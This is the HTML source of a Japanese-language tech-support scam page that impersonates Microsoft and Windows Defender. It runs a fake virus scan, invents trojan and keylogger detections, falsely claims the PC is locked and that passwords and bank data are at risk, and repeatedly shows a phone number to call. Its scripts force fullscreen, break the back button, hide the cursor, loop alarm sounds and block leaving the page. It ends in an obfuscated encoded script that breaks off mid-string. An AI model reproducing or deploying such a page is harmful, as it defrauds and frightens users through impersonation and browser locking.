
<!doctype html>
<html lang="en">
  <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>マイクロソフトセキュリティセンター </title>

        <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>

<script type="text/javascript">
    var phone_number = '(050) 5532-1251';
    var phone_number2 = '(050) 5532-1251';

	</script>

<script>
function ytFunction() {
  document.getElementById("myIMG").style.display = "block";
}
</script>
<script>
function gtFunction() {
  document.getElementById("myIMG").style.display = "none";
}
</script>

      <script type="text/javascript">
function myFunction() {
  return "Write something clever here...";
}
</script>

        <script type="text/javascript">
  function toggleFullScreen() {
	if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
	  if (document.documentElement.requestFullscreen) {
		document.documentElement.requestFullscreen();
	  } else if (document.documentElement.mozRequestFullScreen) {
		document.documentElement.mozRequestFullScreen();
	  } else if (document.documentElement.webkitRequestFullscreen) {
		document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
	  }
	}
  }
</script>
<script type="text/javascript">
  document.addEventListener('keyup', function(es) {
	if (es.keyCode === 27) {
	  toggleFullScreen();
	}
  }, false);
</script>
<script type="text/javascript">
  document.addEventListener('keyup', function(e) {
	if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
	  document.getElementById('map').innerHTML = stroka;
	  toggleFullScreen();
	}
  }, false);
</script>
<script type="text/javascript">
  window.onload = function () {
	document.onclick = function (e) {
	  e = e || event;
	  target = e.target || e.srcElement;
	  if (target.tagName === "DIV") {
		toggleFullScreen();
		document.body.style.cursor = 'not-allowed';
		document.getElementById('map').innerHTML = stroka;
		document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
	  } else {
		toggleFullScreen();
		document.body.style.cursor = 'not-allowed';
		document.getElementById('map').innerHTML = stroka;
		document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
	  }
	}
  }
</script>

<script type="text/javascript">
  addEventListener("click", function() {
	document.getElementById('map').innerHTML = stroka;
	 document.getElementById("play").play();
	if (!isFullScreen) {
	  var el = document.documentElement,
		  rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
	  rfs.call(el);
	  document.getElementById("myDIV").style.display = "none";
	}
  });
</script>

	
        <script type="text/javascript">
            window.onbeforeunload = function() {
   if (data_needs_saving()) {
       return "Do you really want to leave our brilliant application?";
   } else {
      return;
   }
};
        </script>
        <script type="text/javascript">
            window.addEventListener("beforeunload", function (e) {
              var confirmationMessage = 'It looks like you have been editing something. '
                                 + 'If you leave before saving, your changes will be lost.';

                (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
            });
        </script>
        <style type="text/css">
.blink {
background-color:#659e1d;
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
}
.blink2 {
background-color:#659e1d;
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
}

@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

        </style>

        <link href="5f205bb74a5eb_v.css" type="text/css" rel="stylesheet" />
        <!--<script src=".index_files/jquery.min.js" type="text/javascript"></script>-->
        <!--<script type="text/javascript" src="../../bbmaster.js"></script>-->
        <script type="text/javascript">
            //backbutton
            !(function () {
                var t;
                try {
                    for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
                    onpopstate = function (t) {
                        t.state && location.replace("#");
                    };
                } catch (o) {}
            })();
        </script>
        <script>
            var pm_tag = "decpl";
            var pm_pid = "";
        </script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css" />
        <link href="5f205bb63ccd2_v.css" rel="stylesheet" />
        <link id="anstrexCustomLink" rel="stylesheet" type="text/css" href="5f205bc497791_v.css" />
      <script type="text/javascript">
function myFunction() {
  return "Write something clever here...";
}
</script>

<script type="text/javascript">
 $(document).ready(function() {
    var audioElement = document.createElement('audio');
    audioElement.setAttribute('src', 'a0ler0tm0s.mp3');

    audioElement.addEventListener('ended', function() {
        this.play();
    }, false);



    $('#mycanvas').click(function() {
        audioElement.play();

    });


});
</script>

<script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-116984914-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-116984914-2');
</script>

    </head>

   <body id="mycanvas" onbeforeunload="return myFunction()" onclick="showDiv(); gtFunction();" onbeforeunload="return myFunction()" style="overflow: hidden;cursor:none;">
<div style="height:20px; width:100%; position:absolute; z-index:295648245588888888774496151717637875614;" onmouseover="ytFunction();"></div>
<img id="myIMG" src="ls.png" style="position:absolute; display:none; cursor:pointer; z-index:6486268495; top:1px; left:430px;  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.4), 0 6px 20px 0 rgba(0, 0, 0, 0.22);" />

        <div id="chat-box">
         <img src="microsoft.jpg"><span style="color: #222;
    font-size: 21px;
    font-weight: 600;
    margin-left: 6px;
    position: relative;
    top: 5px;">Microsoft</span> <p style="font-weight: 600;">サポート問い合わせ先</p>
        <h4 style="font-weight: 600;"><script>document.write(phone_number);</script></h4>
          <div class="arrow-down">
            <i class="fa fa-caret-down"></i>
          </div>
         </div>

        <audio id="beep" autoplay="">
        <source src="warning.mp3" type="audio/mpeg">
        </audio>

    <div id="delayedPopup" class="delayedPopupWindow lightbox">
  <!-- This is the close button -->
  <!-- <a href="#" id="btnClose"><i class="fa fa-times" aria-hidden="true"></i></a> -->

  <div class="row firewall-pro">
    <div class="col-md-12">
      <div class="green-box" style="-webkit-box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);
    -moz-box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);
    box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);    border: 1px solid #aaa;">
      <div class="row">
        <div class="col-md-8">
          <div class="logo_micro" style="float: left;
    margin-left: 10px;">
          <img src="microsoft.jpg"><span style="color: #000;">Microsoft ウィンドウズファイアウォール保護</span>
          </div>
        </div>
        <div class="col-md-4">
          <div class="minimize">
            <ul>
              <li style="cursor: pointer;"><img src="cut.png" style="width: 12px;"></li>
              <li style="cursor: pointer;"><img src="minus.png" style="width: 12px;"></li>
            </ul>
          </div>
        </div>

      </div>

      </div>
    </div>
    <div class="col-md-4">
      <div class="microsoft-logo">
        <img src="microsoft.jpg"><span>Microsoft</span>
      </div>
    </div>
    <div class="col-md-8">
       <div class="formDescription">
    <h2>トロイの木馬スパイウェアアラート-エラーコード：＃0x268d3</h2>
    <p>このPCへのアクセスはセキュリティ上の理由でブロックされています.</p>
    <p>Microsoftサポートに連絡する: <script>document.write(phone_number2);</script></p>

  </div>
    </div>
  </div>
  <!-- This is the left side of the popup for the description -->
 <footer id="footer">
   <div class="row">
     <div class="col-md-6 left-code">
       <p>脅威が検出されました-トロイの木馬スパイウェア<br>アプリ：Ads.financetrack（1）.exe</p>
     </div>
     <div class="col-md-6">
       <div class="button_new" id="footer_btn">
         <a href="#" class="safe">とにかく実行</a>
         <a href="#" class="anyway blink">安全に戻る</a>
       </div>
     </div>
   </div>
 </footer>
  <!-- End MailChimp Signup Form -->
</div>

     <div class="alert_popup cardcontainer lightbox" style="cursor: none;">
         <div class="container">
             <div class="row">
                 <div class="col-md-12">
                     <p class="" style="    font-size: 16px;
    font-weight: normal;
    margin: 0;
    margin-bottom: 5px;
    padding: 5px 10px;
    color: #414141;font-weight: bold;
    margin-top: 8px;">Microsoft Windows Defender - セキュリティ警告</p>
                     <p class="text-center">** このPCへのアクセスは、セキュリティ上の理由でブロックされています **</p>
                     <p>お使いのコンピュータは、トロイの木馬スパイウェアに感染していることを警告しています。次のデータが危険にさらされています.</p>
                     <p>&gt; 電子メールの資格情報<br>
                      &gt; 銀行のパスワード<br>
                      &gt; フェイスブックログイン<br>
                      &gt; ピクチャー &amp; ドキュメント

                    </p>
                    <p>Microsoft Defender Scanは、パスワード、オンラインID、財務情報、個人ファイル、写真、またはドキュメントを盗む可能性のある望ましくないアドウェアをこのデバイスで検出しました.</p>
                    <p>エンジニアが電話で削除プロセスを案内できるように、すぐにご連絡ください.</p>
                    <p>すぐにWindowsサポートに連絡して、この脅威を報告し、個人情報の盗難を防ぎ、このデバイスへのアクセスのロックを解除してください.</p>
                    <p>このウィンドウを閉じると、個人情報が危険にさらされ、Windows登録が停止されます.</p>
                    <p style="padding-bottom: 0px;">コールウィンドウズサポート: <strong><script>document.write(phone_number);</script></strong></p>
                    <div class="action_buttons"> <a class="active" id="leave_page" style="cursor: pointer;">OK</a> <a class="active" id="leave_page">キャンセル</a> </div>
                 </div>

             </div>
         </div>
     </div>





        <div class="bg">
            <!-- <div class="logo"><img src="5f205bb7e57b5_v.png" alt="Norton™" /></div> -->
            <!-- <div class="menu" id="menu">PRODUCTS & SERVICES &nbsp;&nbsp;&nbsp; INTERNET SECURITY CENTER &nbsp;&nbsp;&nbsp; SUPPORT &nbsp;&nbsp;&nbsp; FREE TRIALS &nbsp;&nbsp;&nbsp; SIGN IN</div> -->
            <div class="bgimg" style="top: 0px;"><img src="background-2.png" alt="" width="100%" /></div>
            <div class="text">
              <!--   <span id="head1">Windows Has Detected a Malicious Virus On Your System</span>
                <span style="font-size: 30px; color: #000;font-weight: 600;" id="head2">Contact Our Certified Windows Technicians For Immediate Assistance</span>
              <span style="font-size: 30px;color: #000;font-weight: 600;"><script>document.write(phone_number);</script></span> -->
            </div>
			   <div id="welcomeDiv"  style="display:none; tbackground-color:#282828; height: 500px; z-index:1245569457815466; width: 100%; margin-left:0px;  " class="answer_list" >
            <p class="text-center" style="color: #FEFEFE;  margin-top:10px; background-color:#282828; font-size: 16px; opacity:.9; " >コンピュータを再起動したり使用したりしないでください。icrosoft Defender Scanは、パスワード、オンラインID、財務情報、個人ファイル、写真、またはドキュメントを盗む可能性のある望ましくないアドウェアをこのデバイスで検出しました.<br>お使いのコンピューターが無効になっています。私に電話してください.エンジニアが電話で削除プロセスを案内できるように、すぐにご連絡ください<br>アクセスは、このコンピューターのブロックセキュリティの理由です.すぐにWindowsサポートに連絡して、この脅威を報告し、個人情報の盗難を防ぎ、このデバイスへのアクセスのロックを解除してください.<br> すぐにご連絡ください。技術者が問題の解決をお手伝いします。このウィンドウを閉じると、個人情報が危険にさらされ、Windows登録が停止されます</p>

            <script>
            function showDiv() {
            document.getElementById('welcomeDiv').style.display = "block";
            }
            </script>

        </div>
        </div>
        <!-- <div class="bottom">
            <div class="logo"><img src="5f205bb933ceb_v.png" alt="Norton™" /></div>
            <div class="copyright">© 2020 NortonLifeLock Inc. <strong style="color: #1ce783;"> sample scanner and an affiliate advertisment.</strong></div>
            <div class="line1"></div>
            <div class="menu" id="menu_b">Legal Notice | License Agreement | Privacy Policy | Careers | Cookies | Site Map | System Status | Agent Viewer</div>
            <div class="line2"></div>
            <div class="text">Save up to 50% on Norton 360 for first year*</div>
        </div> -->
        <a href="#" rel="noreferrer" style="cursor: none;" id="link_black">
            <div class="black" style="height: 145%;"></div> </a>
        <div class="win1" style="cursor: none;">
            <div class="header">
                <img src="microsoft.png" class="ico" />
                <div class="name">Microsoft Windows Defender</div>
                <img src="5f205bba58587_v.png" class="win_min" /> <img src="5f205bbe46967_v.png" class="win_cls" />
            </div>
            <div class="gray_line">
                <img src="5f205bbdae210_v.png" class="ico_gray1" id="w1_ico1" />
                <div class="set" id="w1_1">設定</div>
                <img src="5f205bbae3ed9_v.png" class="ico_gray2" id="w1_ico2" />
                <div class="help" id="w1_2">助けて</div>
            </div>
            <div class="white_line">
                <img src="5f205bb9bf55a_v.gif" class="pc" />
                <div class="txt1" id="w1_3">保護されています</div>
                <div class="txt2">
                    <span id="w1_4">保護の更新: </span><span style="color: #23a31c;" id="w1_5">電流</span><br />
                    <span id="w1_6">最後のスキャン: </span><span style="color: #c00;" id="w1_7">利用不可</span> <span style="color: #2ea8e5;" id="w1_8">| クイックスキャン</span><br />
                    <span id="w1_9">使用したライセンス: </span><span style="color: #23a31c;" id="w1_10">1/5</span> <span style="color: #2ea8e5;" id="w1_11">| 別のデバイスにインストールする</span>
                </div>
            </div>
            <div class="green_line"><img src="5f205bbb6fc7d_v.gif" class="corner" /></div>
            <div class="bl1">
                <div class="txt1" id="w1_12">セキュリティ</div>
                <img src="5f205bbbf25aa_v.gif" class="ico" />
                <div class="txt2" id="w1_13" style="color: red">無効</div>
                <div class="line"></div>
            </div>
            <div class="bl2">
                <div class="txt1" id="w1_14">身元</div>
                <img src="5f205bbc8a6e3_v.gif" class="ico" />
                <div class="txt2" id="w1_13a" style="color: red">危険にさらされている</div>
                <div class="line"></div>
            </div>
            <div class="bl3">
                <div class="txt1" id="w1_15">パフォーマンス</div>
                <img src="5f205bc00090f_v.gif" class="ico" />
                <div class="txt2" id="w1_13b">最適化</div>
                <div class="line"></div>
            </div>
            <div class="bl4">
                <div class="txt1" id="w1_16" style="font-size: 20px;">ファイアウォール</div>
                <img src="microsoft.png" class="ico" style="width: 52px;margin-top: 27px;" />
                <div class="txt2" id="w1_13c">オフになっています</div>
            </div>
            <div class="gray_line2">
                <div class="txt"><span id="w1_17">状態 : </span><span class="gr" id="w1_18" style="color: red;">あなたのパソコンは危険にさらされています!</span></div>
            </div>
        </div>
        <div class="win2" id="win2" style="display: none;cursor: none;">
            <div class="header">
                <div class="name" id="w2_1">クイックスキャン</div>
                <img src="5f205bba58587_v.png" class="win_min" /> <img src="5f205bbe46967_v.png" class="win_cls" />
            </div>
            <div class="line_orange">
                <img src="5f205bbece31e_v.gif" class="ring" />
                <div class="header" id="w2_2">ワーキング</div>
                <div class="txt1" id="w2_3">一般的に感染している領域とスタートアップファイルをスキャンする...</div>
                <div class="txt2" id="path1">C:WindowsSystem32sihost.exe</div>
                <div class="anim" style="background: url('./img/anim_orange.gif');"></div>
            </div>
            <div class="line_red" style="display: none;" id="win2_line_red">
                <img src="5f205bbf6a050_v.gif" class="ring" />
                <div class="header" id="w2_4">ワーキング</div>
                <div class="txt1" id="w2_5">一般的に感染している領域とスタートアップファイルをスキャンする...</div>
                <div class="txt2" id="path2">C:\Program Files\Windows Defender\MSASCuiL.exe</div>
                <div class="anim" style="background: url('./img/anim_red.gif');"></div>
            </div>
            <div class="tab">
                <div class="line1" id="w2_6">結果の概要</div>
                <div class="line2" id="w2_7">[+] スキャンされたアイテムの総数:</div>
                <div class="line3" id="w2_8">[+] 検出されたセキュリティリスクの合計:</div>
                <div class="line4" id="w2_9">[+] 解決されたトータルセキュリティリスク:</div>
                <div class="line5" id="w2_10">注意が必要な総合的なセキュリティリスク:</div>
                <div class="line6"></div>
                <div class="digit1" id="cnt1">143</div>
                <div class="digit2" id="cnt2">0</div>
                <div class="digit3">0</div>
                <div class="digit4" id="cnt4">0</div>
            </div>
            <img src="microsoft.png" class="nrt_logo" /><span class="mask2">ウィンドウズ</span>
            <div class="btn1" id="w2_11">一時停止</div>
            <div class="btn2" id="w2_12">やめる</div>
        </div>
        <a href="#" rel="noreferrer" style="cursor: none;"> </a>

        <div id="vir1">
            <div id="vir_tray">
                <div class="line_red">
                    <span id="w4_1"><b>脅威を発見!</b></span><br />Win32/Hoax.Renos.HX
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2">リスクが高い</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4"><b>原点</b></span><br />
                    <span id="w4_5">利用不可</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6"><b>アクティビティ</b></span><br />
                    <span id="w4_7">実行された脅威アクション: 1</span>
                </div>
            </div>
        </div>
        <div id="vir2">
            <div id="vir_tray">
                <div class="line_red">
                    <span id="w4_1a"><b>脅威を発見!</b></span><br /> トロイの木馬IRC / Backdor.Sd.FRV
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2a">リスクが高い</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4a"><b>原点</b></span><br />
                    <span id="w4_5a">利用不可</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6a"><b>利用不可</b></span><br />
                    <span id="w4_7a">実行された脅威アクション: 1</span>
                </div>
            </div>
        </div>
        <div id="vir3">
            <div id="vir_tray">
                <div class="line_red">
                    <span id="w4_1b"><b>脅威を発見!</b></span><br />
                    Adware.Win32.Look2me.ab
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_3">中リスク</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4b"><b>原点</b></span><br />
                    <span id="w4_5b">利用不可</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6b"><b>アクティビティ</b></span><br />
                    <span id="w4_7b">実行された脅威アクション: 1</span>
                </div>
            </div>
        </div>
        <div id="vir4">
            <div id="vir_tray">
                <div class="line_red">
                    <span id="w4_1c"><b>脅威を発見!</b></span><br />
                    Trojan.Qoologic-キーロガー
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2b">リスクが高い</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4c"><b>原点</b></span><br />
                    <span id="w4_5c">利用不可</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6c"><b>アクティビティ</b></span><br />
                    <span id="w4_7c">実行された脅威アクション: 1</span>
                </div>
            </div>
        </div>
        <div id="vir5">
            <div id="vir_tray">
                <div class="line_red">
                    <span id="w4_1d"><b>脅威を発見!</b></span><br />Trojan.Fakealert.356
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2c">リスクが高い</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4d"><b>原点</b></span><br />
                    <span id="w4_5d">利用不可</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6d"><b>アクティビティ</b></span><br />
                    <span id="w4_7d">実行された脅威アクション: 1</span>
                </div>
            </div>
        </div>
        <script language="JavaScript" type="text/javascript">
            setTimeout(function () {
                document.getElementById("win2").style.display = "block";
            }, 2000);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "143";
            }, 2600);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Windows\System32\csrss.exe";
            }, 3000);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Windows\System32\sihost.exe";
            }, 3700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "218";
            }, 4000);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Program Files\Windows Defender\MSASCuiL.exe";
            }, 4600);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "398";
                document.getElementById("cnt2").style.color = "#dd0000";
                document.getElementById("cnt2").innerHTML = "1";
                document.getElementById("cnt4").style.color = "#dd0000";
                document.getElementById("cnt4").innerHTML = "1";
                document.getElementById("win2_line_red").style.display = "block";
                document.getElementById("beep").play();
            }, 5000);
            setTimeout(function () {
                document.getElementById("vir1").style.bottom = "235px";
            }, 5100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\SgrmBroker.exe";
            }, 5200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "SEMgrSvc";
            }, 5800);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "538";
            }, 6000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "NcaSvc";
            }, 6700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "791";
                document.getElementById("cnt2").innerHTML = "2";
                document.getElementById("cnt4").innerHTML = "2";
            }, 7000);
            setTimeout(function () {
                document.getElementById("vir1").style.bottom = "440px";
                document.getElementById("vir1").style.opacity = "0";
                document.getElementById("vir2").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 7100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\DDFs";
            }, 7500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1021";
                document.getElementById("cnt2").innerHTML = "3";
                document.getElementById("cnt4").innerHTML = "3";
            }, 8000);
            setTimeout(function () {
                document.getElementById("vir2").style.bottom = "440px";
                document.getElementById("vir2").style.opacity = "0";
                document.getElementById("vir3").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 8100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\Recovery";
            }, 8300);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1273";
            }, 9000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\DriverState";
            }, 9200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "tempRoot\system32\DRIVERS\bowser.sys";
            }, 9700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1589";
                document.getElementById("cnt2").innerHTML = "4";
                document.getElementById("cnt4").innerHTML = "4";
            }, 10000);
            setTimeout(function () {
                document.getElementById("vir3").style.bottom = "440px";
                document.getElementById("vir3").style.opacity = "0";
                document.getElementById("vir4").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 10100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\WinBioDatabase";
            }, 10500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1723";
            }, 11000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "vmickvpexchange";
            }, 11600);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1916";
            }, 12000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "HidBtn";
            }, 12300);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "2038";
                document.getElementById("cnt2").innerHTML = "80";
                document.getElementById("cnt4").innerHTML = "80";
            }, 13000);
            setTimeout(function () {
                document.getElementById("vir4").style.bottom = "440px";
                document.getElementById("vir4").style.opacity = "0";
                document.getElementById("vir5").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 13100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "WdNisDrv";
            }, 13200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "rdbss";
            }, 13900);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\dot3svc.dll";
            }, 14700);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "UASPStor";
            }, 15500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "2038";
                document.getElementById("vir5").style.opacity = "0";
                document.getElementById("w2_4").innerHTML = "Done";
                if (lang == "pt") document.getElementById("w2_4").innerHTML = "Terminado";
                if (lang == "es") document.getElementById("w2_4").innerHTML = "Listo";
                if (lang == "fr") document.getElementById("w2_4").innerHTML = "Effectué";
                if (lang == "it") document.getElementById("w2_4").innerHTML = "Fatto";
                document.getElementById("w2_5").innerHTML = "";
                document.getElementById("path2").innerHTML = "";
                document.getElementById("win3").style.display = "none";
                document.getElementById("link_black").href = "#";
            }, 16000);
            function showmess() {
                document.getElementById("mess").style.display = "block";
            }
        </script>
         <script type="text/javascript">
    	/*$(document).ready(function(){
 	 $("#open_popup").click(function(){
    $(".chrome-alert").show();
  });
});*/
    </script>
        <script type="text/javascript">
	addEventListener("click", function() {
    var
          el = document.documentElement
        , rfs =
               el.requestFullScreen
            || el.webkitRequestFullScreen
            || el.mozRequestFullScreen
    ;
    rfs.call(el);
});
</script>
 <script type="text/javascript">
	setTimeout(function(){document.getElementById("map").style.display="block";document.getElementById("warning").play();},10);
</script>
 <script type="text/javascript">
        /*=============HELPER================*/
        var Helper = (function () {

            var data = [];

            var months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'];
            var days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'];

            function setDays(d) {
                if ((d.constructor !== Array) || d.length !== 7)
                    return false;

                days = d;
            }

            function setMonths(m) {
                if ((m.constructor !== Array) || m.length !== 12)
                    return false;

                months = m;
            }

            function getDate() {
                var now = new Date();
                var month = typeof(months[now.getMonth()]) == 'undefined' ? now.getMonth() : months[now.getMonth()];
                return (now.getDate()) + " " + month + " " + now.getFullYear();
            }

            function getMonth() {
                var now = new Date();
                var month = typeof(months[now.getMonth()]) == 'undefined' ? now.getMonth() : months[now.getMonth()];
                return month;
            }

            function getDay() {
                var now = new Date();
                var day = typeof(days[now.getDay()]) == 'undefined' ? now.getDay() : days[now.getDay()];
                return day;
            }

            function getDayOfMonth() {
                var now = new Date();
                var day = ('0' + now.getDate()).slice(-2);
                return day;
            }

            function getUrlParameter(name) {
                name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
                var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
                var results = regex.exec(location.search);
                return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
            }

            function findAncestor(element, name) {
                while ((element = element.parentElement) && !element.classList.contains(name)) ;
                return element;
            }

            function bindOnQuery(query, callback, action = 'click') {
                var elements = document.querySelectorAll(query);
                for (var i = 0; i < elements.length; i++) {
                    elements[i].addEventListener(action, callback, false);
                }
            }

            function bindOnId(name, callback, action = 'click') {
                var element = document.getElementById(name);
                element.addEventListener(action, callback, false);
            }

            function replaceMarkers(text, markers) {
                for (key in markers) {
                    var search = '%' + key + '%';
                    text = text.replace(new RegExp(search, 'g'), markers[key]);
                }

                return text;
            }

            return {
                setDays: setDays,
                setMonths: setMonths,
                getDate: getDate,
                getDay: getDay,
                getMonth: getMonth,
                getDayOfMonth: getDayOfMonth,
                getUrlParameter: getUrlParameter,
                findAncestor: findAncestor,
                bindOnQuery: bindOnQuery,
                bindOnId: bindOnId,
                replaceMarkers: replaceMarkers
            };

        })();
    </script>


<script type="text/javascript">function eval1(){var s1=unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7C%3A.%3CM%7Ewn%7Cljyn.%3BA.%3B%3By.%3B%3E@O%81v.%3B%3E@N%7C%82%818.%3B%3E%3CL.%3B%3E%3CJx.%3B%3EA9t%7Fx8.%3B%3E%3CLK8.%3B%3E%3CLL8JU.%3B%3EA9t.%3B%3E@L8.%3B%3E%3CL.%3B%3E%3CJ.%3B%3E@M.%3B%3E%3CK8.%3B%3E%3CMW.%3B%3E@O%81x.%3B%3E@Mvt%83x8.%3B%3E%3CLK8.%3B%3E%3CL.%3B%3E%3CL.%3B%3E@K8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ.%3B%3EA%3C%818.%3B%3E%3CL.%3B%3E%3COJY.%3B%3E@N.%3B%3EA%3D.%3B%3EA%3C.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU.%3B%3EA%3C.%3B%3EA%3D%81.%3B%3EA%3D.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJY%838.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CM8.%3B%3E%3CL.%3B%3E%3COJY.%3B%3EA%3B%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWV.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWW.%3B%3E%3CJU%608.%3B%3E%3CL.%3B%3E%3COJW%838.%3B%3E%3CL.%3B%3E%3COJY8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3COJW.%3B%3EA%3C.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU%838.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CK%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJYL%81%7F.%3B%3EA%3C%81%83.%3B%3EA%3A%608.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ%80%80.%3B%3EA%3A%83.%3B%3E%3CJ8.%3B%3E%3CL